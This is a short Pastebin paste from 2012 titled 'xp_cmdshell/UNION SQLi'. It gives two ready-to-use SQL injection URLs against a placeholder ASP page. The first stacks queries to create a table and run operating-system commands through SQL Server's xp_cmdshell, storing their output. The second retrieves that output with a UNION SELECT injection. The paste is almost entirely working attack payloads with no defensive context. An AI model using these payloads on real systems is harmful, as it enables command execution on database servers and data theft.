SHARE
TWEET

xp_cmdshell/UNION SQLi

stamparm Jun 20th, 2012 358 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1) executing xp_cmdshell
  2. http://www.target.com/vuln.asp?param=1';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
  3.  
  4. 2) result retrieval through UNION injection
  5. http://www.target.com/vuln.asp?param=-1' UNION ALL SELECT NULL, NULL, output FROM result--
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top